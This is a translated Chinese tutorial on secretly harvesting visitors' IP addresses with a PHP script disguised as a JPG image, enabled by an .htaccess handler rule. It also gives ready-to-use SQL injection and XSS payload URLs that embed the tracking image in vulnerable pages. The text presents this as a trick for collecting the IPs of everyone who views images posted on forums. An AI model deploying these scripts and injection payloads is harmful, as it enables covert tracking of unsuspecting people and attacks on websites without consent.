在本教程中，我們將學(xué)習(xí)如何用一張照片來盜取ip地址。我的想法是通過修改.htaccess文件，將jpg文件當(dāng)作php文件來解析。

下面就是我們需要向.htaccess中添加的代碼：

AddHandler application/x-httpd-php5 .jpg

然后將下面的代碼復(fù)制到記事本中，命名為grabber.jpg

<?php

$fh = fopen(‘ip_list.txt', ‘a(chǎn)');

fwrite($fh, $_SERVER[‘REMOTE_ADDR'].”

“);

fclose($fh);

$im = imagecreatefromjpeg(“n00b.png”);

header(‘Content-Type: image/jpeg');

imagejpeg($im);

imagedestroy($im);

?>

將grabber.jpg的權(quán)限設(shè)置為755，然后再找一張照片，將其命名為n00b.png，接著放到與grabber.jpg相同的目錄之中。

就這樣，一切工作就緒了。當(dāng)別人瀏覽grabber.jpg這張照片的時候，他的ip地址就會被記錄下來。

（譯者注：需要把這些東西上傳至我們的個人網(wǎng)站空間中）

POC：

(譯者注：作者這里貼了一張可獲取ip的演示照片，為了大家的隱私，我沒有將其貼出，讀者可自行去作者博客查看)

至此，我們的照片已經(jīng)可以開始工作了。

接著我還想說明一下如何使用SQLi來獲取ip地址。其實使用照片來盜取ip地址十分快捷，我們沒有理由去使用SQLi這種方法，但是為了讓讀者獲取到更多的知識，我還是說明一下吧：

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1′ union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#

現(xiàn)在，再說一下如何使用xss來獲取ip地址：

http://leettime.net/xsslab1/chalg1.php?name=<img src=”http://leettime.net/idiots_test_lab/imageip/tryme.jpg”>&submit=Search

好了，就是這些了。

我們可以用這個技巧做許多有趣的事情，事實上大部分社區(qū)都允許我們發(fā)布一些照片，所以我們可以用這個方法去獲取所有訪問到我們照片的人的ip地址。

以上所述是小編給大家介紹的基于PHP實現(xiàn)通過照片獲取ip地址的相關(guān)內(nèi)容，希望對大家有所幫助！